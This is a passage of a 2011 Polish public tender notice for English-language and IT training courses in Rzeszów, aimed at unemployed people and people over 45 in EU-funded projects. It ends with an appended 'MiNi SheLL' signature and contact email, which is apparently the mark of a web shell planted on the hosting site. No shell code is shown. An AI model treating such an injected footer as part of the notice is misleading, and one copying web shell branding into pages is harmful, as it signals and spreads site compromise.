15. Przekazania Zamawiającemu każdorazowo w terminie 7 dni kalendarzowych po zakończeniu zajęć przez daną grupę szkoleniową kompletu dokumentacji dla danej grupy obejmującej:
- oryginał dziennika zajęć,
- kserokopie wydanych uczestnikom zaświadczeń/certyfikatów potwierdzonych za zgodność z oryginałem (wraz z datą),
- oryginał listy potwierdzającej odbiór zaświadczeń/certyfikatów,
- zestawienie materiałów szkoleniowych stosowanych jako uzupełnienie do podręcznika i ćwiczeń),
- testy każdego uczestnika mierzące postęp w nauce oraz ich wyniki (omówienie wyników testów i postępów w nauce).
16. Przestrzegania oznakowań unijnych i projektowych na w/w dokumentach.
17. Przechowywania dokumentów związanych z organizacją i współfinansowaniem przedmiotowego szkolenia do grudnia 2020 r. i udostępnienia ich na życzenie Zamawiającego lub innych instytucji kontrolujących.

V. Potencjał techniczny:
Wykonawca powinien dysponować lub zapewnić na cele realizacji przedmiotu zamówienia bazę szkoleniową z odpowiednimi pomieszczeniami wraz z zapleczem do przeprowadzenia szkolenia dla osób dorosłych tj. posiadających odpowiednie warunki sanitarne bezpieczeństwa i higieny pracy, akustyczne i jakościowe narzędzia i urządzenia, a także pomoce dydaktyczne niezbędne do wykonania zamówienia tj. sale edukacyjne dla grupy 15 osobowej i trenera. Infrastruktura oraz sale szkoleniowe powinny być dostosowane do potrzeb osób dorosłych i zapewnione przez Wykonawcę na cele realizacji szkolenia z języka angielskiego dla 5 grup 15 osobowych w dniach i godzinach wynikających z Harmonogramów (Załącznik nr 3A i Załącznik nr 3B).
Miejsce odbywania szkolenia: Rzeszów.
Zamawiający zastrzega sobie prawo kontroli przygotowanych stanowisk szkoleniowych oraz warunków higieniczno - sanitarnych dzień przed rozpoczęciem szkolenia i podczas szkolenia oraz dokonania niezapowiedzianej kontroli przebiegu i sposobu prowadzenia szkolenia. 

VI. Potencjał kadrowy:
Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowane osoby, które będą uczestniczyć w wykonywaniu zamówienia - szkolenie z języka angielskiego wraz 
z informacjami dotyczącymi ich kwalifikacji niezbędnymi do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności.
Wymagania wobec kadry trenerskiej:
Wykonawca musi zapewnić minimum 3 osoby posiadające:
- wykształcenie: magister lub licencjat filologii angielskiej, magister lingwistyki stosowanej /język angielski/;
- doświadczenie w prowadzeniu szkoleń z języka angielskiego (minimum 2 lata i/lub co najmniej 5 przeprowadzonych szkoleń/kursów);
- doświadczenie w pracy z osobami dorosłymi.
Powyższe wymagania muszą być spełnione łącznie dla każdego trenera.

VII. Doświadczenie zawodowe
Wykonawca musi specjalizować się w prowadzeniu szkoleń językowych.
Wykonawca musi wykazać, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował (rozpoczął i zakończył) co najmniej 5 szkoleń dla min. 50 osób z zakresu szkoleń językowych  - potwierdzenie: referencje itp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.58.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkolenie z zakresu technologii informacyjnych i komunikacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie usługi szkoleniowej z zakresu technologii informacyjnych i komunikacyjnych dla 75 Beneficjentów dwóch projektów, w tym dla:
- 30 Beneficjentów Projektu DAJMY SZANSĘ DOJRZAŁOŚCI o numerze identyfikacyjnym KSI: WND-POKL.07.02.01-18-249/09 współfinansowanego z Europejskiego Funduszu Społecznego realizowanego w ramach Poddziałania 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym, Działanie 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Priorytet VII Promocja integracji społecznej;
- 45 Beneficjentów Projektu FOCUS -Twoje miejsce w życiu, Twoje miejsce na rynku pracy, o numerze identyfikacyjnym KSI: WND-POKL.07.02.01-18-248/09 współfinansowanego z Europejskiego Funduszu Społecznego realizowanego w ramach Poddziałania 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym, Działanie 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Priorytet VII Promocja integracji społecznej.
Uczestnikami projektu będą:
- osoby po 45 roku życia: 30 osób
- osoby długotrwale bezrobotne: 45 osób
Liczba uczestników szkolenia z zakresu technologii informacyjnych i komunikacyjnych: 75 osób.
Liczba grup: 5 grup 15 osobowych, w tym:
- 2 grupy x 15 osób = 30 osób w ramach Projektu DAJMY SZANSĘ DOJRZAŁOŚCI
- 3 grupy x 15 osób = 45 osób w ramach Projektu FOCUS -Twoje miejsce w życiu, Twoje miejsce na rynku pracy
Liczba godzin przypadająca na jedną grupę: 60 godzin lekcyjnych (1 godzina = 45 minut) 5h dziennie, 3 razy w tygodniu (w dni powszednie od poniedziałku do piątku). Zgodnie z harmonogramem przedstawionym przez Zamawiającego (Załącznik nr 3A - Harmonogram Projektu DAJMY SZANSĘ DOJRZAŁOŚCI, Załącznik nr 3B - Harmonogram Projektu FOCUS -Twoje miejsce w życiu, Twoje miejsce na rynku pracy).
Łączna liczba godzin: 300 godzin lekcyjnych (45 minutowych).

II. Czas realizacji przedmiotu zamówienia:
Przewidywany termin realizacji zamówienia: od 05 maja 2011 roku do 30 czerwca 2011 roku (5 grupy szkoleniowych tj. 75 BO w tym 3 grupy osób długotrwale bezrobotnych i 2 grupy osób po 45 roku życia).

III. W ramach przedmiotu zamówienia Wykonawca ma zapewnić:
1. Catering dla każdego uczestnika szkolenia, we wszystkie dni szkolenia, obejmujący:
- przerwę kawową na rozpoczęcie szkolenia, w tym: herbatę (1 kubek/filiżanka na 1 osobę), kawę rozpuszczalną (2 kubki/filiżanki na 1 osobę), sok (1 kubek na 1 osobę), cytrynę do herbaty (dla każdej osoby), mleko do kawy (dla każdej osoby), cukier, serwetki;
- obiad w ciągu dnia szkoleniowego w tym: herbatę (1 kubek/filiżanka na 1 osobę), kawę rozpuszczalną (1 kubek/filiżanka na 1 osobę), cytrynę do herbaty (dla każdej osoby), mleko do kawy (dla każdej osoby), cukier, serwetki
oraz gorący posiłek (1 drugie danie na 1 osobę), składający się z:
- ziemniaków (minimum 100 gram), mięsa lub ryby (minimum 150 gram) oraz surówki (minimum 100 gram) na 8 dni szkoleniowych dla każdej grupy;
- dania jarskiego na pozostałe 4 dni szkoleniowe dla każdej grupy.
Herbata, kawa oraz drugie danie muszą być podane gorące w naczyniach lub pojemnikach termoizolacyjnych, odrębnie dla każdej grupy szkoleniowej.
Czas na przerwy kawowe i obiadowe należy doliczyć do założonej liczby godzin dydaktycznych  szkolenia. Dzienna liczba godzin szkolenia wynikająca z Harmonogramów (Załączniki 3A i 3B) obejmuje przerwy kawowe i obiadowe.

2. Komplet materiałów dla każdego uczestnika szkolenia, obejmujących: 
- papierową (wydrukowaną i spiętą) wersję materiałów szkoleniowych,
- materiały papiernicze, przybory do pisania i inne środki dydaktyczne niezbędne do realizacji szkolenia.
3. Zestaw komputerowy dla każdego uczestnika w grupie szkoleniowej wyposażony 
w system operacyjny  WINDOWS XP lub WINDOWS 7 oraz Pakiet Microsoft Office 2003 lub 2007 i inne oprogramowanie niezbędne do osiągnięcia celów szkolenia.
4. Sale komputerowe z oświetleniem dziennym i sztucznym oraz z zapleczem sanitarnym.
IV. Szczegółowa tematyka szkolenia z zakresu technologii informacyjnych 
i komunikacyjnych
- obsługa systemu operacyjnego Windows XP lub Windows 7
- obsługa pakietu Microsoft Office 2003 lub 2007, w tym:
- obsługa edytora tekstu WORD,
- obsługa arkusza kalkulacyjnego EXCEL,
- obsługa programu PowerPoint,
- obsługa Internetu,
- obsługa poczty elektronicznej.
Tematyka szkolenia powinna być dopasowana do stopnia zaawansowania uczestników tworzących daną grupę szkoleniową (możliwe poziomy umiejętności uczestnika szkolenia to: podstawowy, średniozaawansowany, zaawansowany).

V. Wykonawca zobowiązuje się do: 
1. Opracowania, wydrukowania i rozdania wszystkim uczestnikom materiałów szkoleniowych dla każdego poziomu zaawansowania grup szkoleniowych, pozwalających na samodzielną edukację z zakresu tematyki szkoleń.
2. Przeprowadzenia usługi zgodnie z przedmiotem zamówienia i harmonogramem dołączonym do przedmiotu zamówienia (Załącznik nr 3A - Harmonogram Projektu DAJMY SZANSĘ DOJRZAŁOŚCI, Załącznik nr 3B - Harmonogram Projektu FOCUS -Twoje miejsce w życiu, Twoje miejsce na rynku pracy).
3. Prowadzenia ciągłego nadzoru i kontroli merytorycznej nad realizacją usługi w celu zapewnienia wysokiego poziomu prowadzonego szkolenia. 
4. Przeprowadzania testów, ćwiczeń mierzących postęp w nauce Beneficjentów (wynik testów procentowy) w tym: testu na początku szkolenia, w trakcie i na zakończenie szkolenia oraz przygotowania na koniec szkolenia omówienia wszystkich testów i postępów w nauce dla każdego Beneficjenta odrębnie. 
5. Bieżącego informowania Zamawiającego o pojawiających się problemach w realizacji usługi, w tym o przypadkach nieobecności uczestników na zajęciach oraz wypadkach rezygnacji z uczestnictwa w trakcie realizacji usługi, pod rygorem odmowy zapłaty za całe szkolenie dla tych osób.
6. Stosowania wzorów list obecności, list odbioru materiałów oraz list odbioru zaświadczeń/certyfikatów przekazanych przez Zamawiającego. Otrzymane wzory Wykonawca zobowiązuje się samodzielnie drukować i wykorzystywać w trakcie realizacji całego przedmiotu zamówienia zgodnie z ich przeznaczeniem.
7. Prowadzenia dokumentacji szkolenia oddzielnie dla każdej grupy uczestników oraz jej oznakowania zgodnie z wytycznymi Zamawiającego dla każdego projektu w tym:
- list obecności szkolenia za każdy dzień uczestnictwa w szkoleniu, podpisanych odręcznie przez uczestników i przeprowadzającego szkolenie (listy obecności będą zawierać zapis Podpis na liście stanowi potwierdzenie obecności na szkoleniu i skorzystania z cateringu);
- dziennika zajęć zawierającego wymiar godzin, program i tematy szkolenia, podpisy osób prowadzących daną grupę szkoleniową, wykaz obecności uczestników szkolenia, oceny i informacje dotyczące postępów w nauce każdego uczestnika oraz dodatkowe informacje, w tym wizyty kontrolne;
- listy potwierdzającej otrzymanie materiałów szkoleniowych (z wyszczególnieniem, co wchodzi w ich skład), potwierdzonych odręcznym podpisem przez każdego uczestnika szkolenia.
8. Umożliwiania Zamawiającemu przeprowadzenia wszelkich ankiet ewaluacyjnych 
i oceniających oraz prowadzenia kontroli przebiegu realizacji szkolenia.
9. Umieszczenia informacji o projekcie w miejscu przeprowadzenia szkolenia zgodnie 
z wytycznymi oznaczania projektów w ramach PO KL, przekazanymi przez Zamawiającego.
10. Zapewnienia wykwalifikowanych i doświadczonych trenerów/prowadzących dla każdej z 5 grup szkoleniowych, odpowiednich do poziomu zaawansowania każdej grupy.
11. Zmiany wskazanego przez Zamawiającego trenera/prowadzącego szkolenie w przypadku zaistnienia okoliczności wskazujących na niewywiązywanie się przez niego w należyty sposób z powierzonych mu zadań.
12. Wydania uczestnikom szkolenia zaświadczenia/certyfikatu o jego ukończeniu, zgodnie 
z obowiązującymi w tym zakresie przepisami, poświadczającego ich uczestnictwo 
w działaniach realizowanych w ramach projektu. Zaświadczenia powinny zawierać oznaczenia wymagane przez RARR S.A. Ostateczna treść i wygląd zaświadczeń muszą zostać zatwierdzone przez Zamawiającego.
13. Przekazania Zamawiającemu każdorazowo w terminie 3 dni kalendarzowych po zakończeniu zajęć w danym miesiącu przez każdą grupę szkoleniową kompletu dokumentacji obejmującej oryginały list obecności, za każdy dzień szkolenia,
14. Przekazania Zamawiającemu każdorazowo w terminie 7 dni kalendarzowych po zakończeniu zajęć przez daną grupę szkoleniową kompletu dokumentacji obejmującej:
- oryginał dziennika zajęć, 
- oryginał listy potwierdzającej odbiór materiałów szkoleniowych przez uczestników,
- kserokopii wydanych uczestnikom zaświadczeń/certyfikatów potwierdzonych za zgodność z oryginałem (wraz z datą),
- oryginał listy potwierdzającej odbiór certyfikatów,
- komplet materiałów szkoleniowych z każdej tematyki oraz na dany poziom zaawansowania,
- testy każdego uczestnika mierzące postęp Beneficjentów w nauce oraz ich wyników (omówienia wyników testów i postępów w nauce).
Wykonawca zobowiązuje się do przestrzegania oznakowań unijnych i projektowych na w/w dokumentach.
15. Przechowywania dokumentów związanych z organizacją i współfinansowaniem przedmiotowego szkolenia do grudnia 2020 r. i udostępnienia ich na życzenie Zamawiającego lub innych instytucji kontrolujących.

VI. Potencjał kadrowy:
Wykonawca musi dysponować odpowiednio wykwalifikowaną kadrą, której powierzy realizację przedmiotu zamówienia - szkoleń z zakresu technologii informacyjnych 
i komunikacyjnych wraz z informacjami dotyczącymi ich kwalifikacji niezbędnymi do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności.
Wymagania wobec kadry trenerskiej:
Wykonawca musi zapewnić minimum 2 osoby posiadające:
- wykształcenie wyższe kierunkowe (informatyczne) minimum licencjat;
- doświadczenie w prowadzeniu szkoleń komputerowych (minimum 2 lata i/lub co najmniej 5 przeprowadzonych szkoleń);
- doświadczenie w pracy z  osobami dorosłymi.
Powyższe wymagania muszą być spełnione łącznie dla każdego trenera.

VII. Potencjał techniczny:
Wykonawca powinien dysponować lub zapewnić na cele realizacji przedmiotu zamówienia bazę szkoleniową z odpowiednimi pomieszczeniami wraz z zapleczem do przeprowadzenia szkolenia dla osób dorosłych tj. posiadających odpowiednie warunki sanitarne bezpieczeństwa i higieny pracy, akustyczne i jakościowe narzędzia i urządzenia, a także oprogramowania i pomoce dydaktyczne niezbędne do wykonania zamówienia tj. sale komputerowe, min 15 komputerów wraz z oprogramowaniem oraz dostępem do Internetu. Infrastruktura oraz sale szkoleniowe powinny być dostosowane do potrzeb osób dorosłych i zapewnione przez Wykonawcę na cele realizacji szkolenia z zakresu technologii informacyjnych i komunikacyjnych dla 5 grup 15 osobowych w dniach i godzinach wynikających z Harmonogramów (Załącznik nr 3A i Załącznik nr 3B).
Miejsce odbywania szkolenia: Rzeszów.
Zamawiający zastrzega sobie prawo kontroli przygotowanych stanowisk szkoleniowych oraz warunków higieniczno - sanitarnych dzień przed rozpoczęciem szkolenia i podczas szkolenia oraz dokonania niezapowiedzianej kontroli przebiegu i sposobu prowadzenia szkolenia. 

VIII. Doświadczenie zawodowe
Wykonawca musi specjalizować się w prowadzeniu szkoleń z zakresu technologii informacyjnych i komunikacyjnych.
Wykonawca musi wykazać, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował (rozpoczął i zakończył) co najmniej 5 szkoleń dla min. 50 osób z zakresu technologii informacyjnych i komunikacyjnych.  - potwierdzenie: referencje itp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.31.00-0, 80.53.32.00-1, 80.53.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com